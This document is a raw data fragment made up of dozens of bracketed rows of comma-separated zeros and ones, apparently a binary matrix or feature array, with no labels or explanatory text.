[0,1,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,1,1,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,1,1,0,0,0,1,0,0,0,0,0,0,0,1],
[1,0,0,0,1,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,1,0,1,1,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0],
[0,0,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,1,0,0,0,0,0,1,0,1,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0],
[1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,1,0,0,0,0,1,1,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,1,0,0,0,0,0,0,1,0,1,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,1,0],
[0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,1,0,0,1,0,1,0,0,0,0,1,0,0,1,1,1,0,0,0,0,0,0,1,0,1,0,0,0,0,1,0,1,0,0,0,0,1],
[1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,1,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,1,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,1,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0],
[1,0,1,0,0,0,0,1,1,1,1,0,0,1,0,0,0,0,1,0,0,1,0,0,0,0,1,1,0,1,0,1,0,0,0,1,0,1,0,0,0,0,1,0,1,0,0,0,1,0,1,1,0,0,0,1,1,0,0,0,0,1,0,0,0,1,0,1,0,1,1,0,1,1,0,0,1,0,0,0,1,0,1,1,1,0,0,0,0,1,1,1,0,1,0,1,0,0,0],
[1,1,1,0,0,0,1,1,1,0,0,1,0,1,0,0,0,0,0,1,1,1,0,0,0,1,0,0,0,0,1,0,1,0,0,1,0,1,0,0,0,0,1,0,1,1,0,1,0,0,1,0,0,0,0,1,1,1,1,0,1,0,0,1,1,0,1,1,0,0,0,0,1,0,1,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,1,0,0,1,0,0],
[1,0,1,0,1,0,0,1,1,1,0,0,1,0,0,1,1,0,0,0,0,0,0,1,0,1,0,0,1,1,0,1,0,1,0,1,1,0,0,0,0,0,0,1,0,1,0,1,0,0,0,1,0,0,0,1,1,0,0,0,1,0,1,0,0,0,1,0,0,0,0,0,1,1,1,0,0,0,1,0,1,1,0,0,0,0,0,1,0,1,1,0,1,1,0,0,1,1,0],
[1,0,1,1,1,0,0,0,0,1,0,1,0,0,0,0,0,1,0,0,1,0,0,1,1,0,0,0,1,0,0,0,1,0,1,1,1,0,0,0,0,0,0,1,0,1,0,0,0,1,0,0,0,0,1,0,1,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,1,1,1,1,0,0,0,0,0,0,0,0,0,0,1,1,0,1,1,0,0,1,0,0,1,0,0],
[0,0,0,1,0,0,0,0,1,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0],
[1,1,1,0,0,0,0,0,0,1,1,1,1,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,1,0,1,1,1,1,0,0,0,1,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,1,0,0,1,0,0,0,0,0,1,1,0,1,0,0,0,0,1,0,0,0,0,1,1],
[1,0,0,0,0,0,0,1,0,1,0,1,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,1,1,1,0,0,0,1,0,0,0,0,0,0,1,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,1,0],
[0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,1,0,0,1,0,1,0,0,0,1,0,0,1,0,0,0,0,0,0,1,1,1,0,1,0,1,0,0,0,0,0,1,0,1,0,0,0,1,0,1,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,1,0,1],
[0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,1,0,0,0,1,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,1,0,1,0,0,0,0,0,0,1,0,0,1,0,0,0,1,1,0,0,0,1,0,0,1,0,0,1,0,0,0,0,0,1,0,1],
[0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0],
[0,0,0,0,0,0,0,1,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,1,1,0,1,0,0,0,0,0,0,1,0,0,0,0,1,1,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,1],
[0,1,1,0,0,1,0,0,1,1,1,1,1,1,0,0,1,0,0,0,0,1,0,0,0,0,1,1,0,0,1,1,0,0,0,1,0,0,0,0,1,1,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,1,1,0,1,0,1,1,0,1,0,0,0,0,1,1,1,0,0,0,0,0,1,1,1,0,0,0,0,1,1,1,0,0,1,0,0,0],
[1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,1,0,0,0,0,0,1,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,1,1,0,0,0,0,0],
[1,1,0,0,0,0,1,0,0,0,1,1,0,0,0,0,0,0,0,1,0,1,0,0,0,1,0,0,0,0,1,1,0,0,0,0,0,1,1,1,0,0,0,0,0,1,0,1,0,0,0,1,0,0,1,0,0,1,0,0,1,1,0,1,1,1,0,0,1,0,0,0,0,0,0,1,1,0,0,0,0,1,0,0,1,0,1,0,0,1,1,1,0,1,1,0,0,0,1],
[1,0,0,0,1,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,1,1,0,1,0,0,0,0,0,0,0,1,1,1,1,0,1,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,1,1,0,1,1,1,0,0,1,0,1,1,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,1],
[0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,1,0,0,0,0,1,0,0,0,0,0,0,1,0,0,1,0,0,0,0,1,1,1,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0],
[0,0,1,0,1,0,0,0,0,0,1,0,1,0,1,0,0,0,0,0,1,0,1,0,0,0,0,0,1,0,0,1,1,0,0,0,1,1,1,1,0,0,0,1,1,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,1,0,0,0,1,0,1,1,0,0],
[1,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,1,0,1,1,0,0,0,0,0,1,0,0,0,0,1,1,0,0,0,0,0,1,0,0,0,0,1],
[0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0],
[1,1,1,1,1,1,0,0,1,1,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,1,0,0,1,0,1,0,0,0,0,1,0,0,0,0,0,0,0,1,1,0,0,1,1,0,0,1,1,0,0,1,1,0,1,0,0,0,0,0,0,1,1,0,0,0,0,0,1,0,0,1,0,0,0,0,1],
[1,0,0,1,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,1,0,1,0,1,0,0,0,1,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,1,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,1],
[0,0,0,1,0,0,0,0,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,1],
[0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,1,0,1,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[1,1,1,0,1,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,1,1,0,0,0,1,1,1,0,0,0,1,0,0,0,1,0,0,1,1,0,0,1,0,1,1,0,0,0,0,0,0,0,1,0,0,0,0,1,0,1,0,0,1,0,0,0,0,1,0,1,0,0,0,1,0,0,1,0,1,1,0,1,0,0,0,1,1,1,0,0,0,0,0,0,0,0],
[1,1,1,0,0,1,0,0,0,0,1,1,0,0,0,0,0,1,0,1,0,0,1,0,0,0,1,0,0,0,1,1,1,0,0,1,0,1,1,0,1,1,1,0,0,1,1,1,0,0,0,0,0,1,1,0,1,0,0,0,1,0,0,1,1,0,1,1,1,0,0,0,0,0,0,0,1,0,0,0,1,1,1,0,1,1,0,0,0,1,1,0,0,0,0,0,0,1,1],
[0,1,0,0,0,0,0,1,0,0,1,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,1,1,1,0,1,0,1,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,1,0,1,0,0,1,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,1,0,1],
[0,0,0,1,0,0,0,0,1,0,0,1,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0],
[0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,1,0,1,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,1,0,0,0,0,1,0,0,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1],
[1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0],
[0,0,1,0,0,1,0,1,0,0,1,1,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,1,0,1,1,1,0,1,1,1,1,1,0,0,0,0,0,0,1,1,1,0,1,1,0,1,0,1,0,1,1,0,1,0,1,0,1,0,0,0,1,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0],
[0,0,1,0,1,1,0,0,1,0,0,1,0,0,0,0,0,1,1,0,1,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,1,1,0,1,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,1,0,1,0,1,1,0,0,0,0,0,0,1,1,0,0,0,0,1,0,0,1,0,1,0,0,1,1,1,0,1,0,0,0,0,1],
[0,0,0,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,1,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,1,0,1,0,0,0,0,0,0,1,0,0,0,0,0,1,0,1,0,0,0,1,0,1,0,1,1,0,0,0,0,0],
[1,0,1,0,0,1,0,1,0,0,0,1,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,1,1,1,0,1,1,0,0,0,0,0,0,1,0,0,1,1,1,0,0,1,1,0,0,0,1,0,0,1,0,1,0,0,0,0,1,1,0,0,1,0,1,0,0,1,0,0,0,0,1,0,0,0,0,0,1,0,0,0],
[1,1,1,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,1,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,1,0,0,0,1,0,0,1,0,0,0,0,1,1,0,0,0,0,0,0,1,1],
[0,1,0,0,0,0,0,0,1,0,0,1,1,1,0,0,1,0,0,0,0,1,0,0,1,0,0,1,0,0,1,0,0,0,1,0,0,0,0,1,0,0,1,0,1,1,0,0,0,0,1,0,0,0,1,0,0,1,0,0,1,1,1,1,0,0,1,1,0,0,1,0,0,0,0,1,1,0,0,0,0,1,0,1,0,1,0,0,0,1,1,0,0,0,0,0,0,0,0],
[1,0,1,1,1,1,0,0,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,1,1,1,0,1,1,1,0,0,0,0,1,0,1,0,0,0,1,1,0,0,1,0,1,1,0,1,1,1,0,0,0,1,1,0,0,0,0,0,1,0,0,1,0,0,0,0,1,1,1,1,0,0,0,0,1,0,1,0,0,1,1,0,1,0,0,1],
[0,0,1,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,1,0,0,1,0,0,0,0,0,1,1,0,0,1,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0],
[0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,1,0,1,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,1,0,0,0,0,1],
[0,0,1,0,0,0,0,0,1,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,1,0,0,1],
[0,0,1,0,0,1,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,1,0,0,0,1,0,1,0,1,0,0,0,0,0,1,0,0,1,0,1,0,0,0,1,0,0,0,0,0,1,1,1,0,0,0,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,1],
[1,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,1,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0],
[0,0,0,1,0,1,0,0,0,1,0,1,0,0,0,1,0,0,0,1,0,0,0,0,1,0,0,1,0,0,1,1,1,1,0,1,0,1,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,1,0,0,0,0,0,0],
[1,0,1,1,0,0,0,0,0,1,0,1,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,1,1,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0],
[0,1,1,1,0,0,0,1,1,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,1,0,1,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,1,1,0,0,0,0,1,1,0,0,1,0,0,0,0,1,0,0,0,0,1,0],
[0,0,1,1,1,0,0,0,1,0,0,1,1,0,0,0,1,0,0,1,1,1,0,0,0,0,0,1,0,1,0,1,0,1,1,1,0,1,1,1,1,1,1,0,1,1,1,0,1,1,0,0,0,1,0,0,0,0,0,0,0,1,0,1,0,1,0,1,0,1,1,0,1,1,1,0,1,0,0,1,0,1,0,1,1,0,0,0,1,1,1,1,0,0,0,1,1,0,0],
[0,1,0,0,0,1,0,0,1,0,0,1,1,0,0,0,1,0,0,0,0,1,1,0,0,1,1,1,0,0,1,1,0,0,0,0,0,1,0,0,1,1,1,0,1,0,1,0,0,0,1,0,1,0,1,1,0,0,0,0,1,1,1,1,1,1,0,0,1,1,1,0,1,0,0,1,0,0,0,0,0,1,1,0,1,1,0,0,1,0,1,1,0,0,1,1,0,0,1],
[0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,1,1,0,1,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1],
[1,0,0,0,1,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1,0],
[1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,1,1,0,0,0,1,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,0],
[1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,1,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,1,0,0,1,0,0,1,1,0,0,0,0,0,1,0,1,1,1,1,0,0,0,1,0,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0],
[1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,1,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1],
[0,1,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,1,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0],
[1,0,1,1,0,1,0,1,1,0,1,1,0,1,0,0,1,0,0,0,1,1,1,0,0,1,0,1,0,0,1,1,0,0,0,1,0,1,0,1,1,1,1,0,1,0,1,0,0,1,1,0,0,0,1,1,1,0,1,0,0,1,1,1,1,0,0,0,1,1,1,0,1,0,1,1,1,0,0,0,0,0,1,0,0,1,0,0,0,1,1,1,1,1,0,1,0,0,1],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,1,0,1,0,0,0,0,0,0,1,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,1,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,1,0,0,0],
[0,1,0,1,0,0,1,1,0,0,1,0,0,1,0,1,0,0,0,0,0,0,1,0,0,0,1,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,1,1,0,1,0,0,0,0,0],
[1,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,1,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,1,1,0,0,0,0,0,1,0,0,0,0,1,0,0,1,0,0,0,1,1,0,0,0,0,0,0,1,0,0,0,1,0,1,0,0,0,0,1,0],
[0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,1,1,0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,1,1,0,0,0,0,0,1,0,1,1,1,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,1],
[0,1,1,0,0,0,1,1,1,0,1,1,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,1,1,1,1,0,0,1,0,1,0,0,1,0,1,1,0,0,0,0,1,0,1,0,1,1,1,0,0,0,0,1,1,0,1,1,0,0,0,0,0,0,1,0,0,1,1,1,0,0,0,0,0,1,1,0,1,1,0,1,0,0,1,0,0,0,1,0,1],
[0,0,0,0,0,1,0,0,1,0,0,1,0,0,0,0,0,0,1,0,0,1,0,0,0,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,0,1,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0],
[0,0,1,1,1,0,0,0,0,1,0,0,0,0,1,0,0,1,0,0,0,0,0,1,0,0,0,0,1,1,0,0,1,0,1,1,1,0,0,0,0,0,1,1,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,1,1,0,1,0,0,0,1,1,0,0,0,0,1,0,0,1,0,0,1,0,0,1,0,0,0,0,0],
[0,0,1,1,0,0,1,0,0,1,1,1,1,0,0,0,0,0,1,1,0,0,0,0,1,1,0,1,1,0,1,1,1,1,0,0,1,0,0,0,0,0,0,1,1,0,0,1,1,0,1,0,0,0,0,0,0,0,0,0,0,1,1,0,0,0,1,0,1,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,0,1,0,1,1,0,0,0],
[0,0,1,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0],
[0,1,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,1,0,0,1,0,0,0,0,0,1,1,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0],
[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,1,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,1,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0],
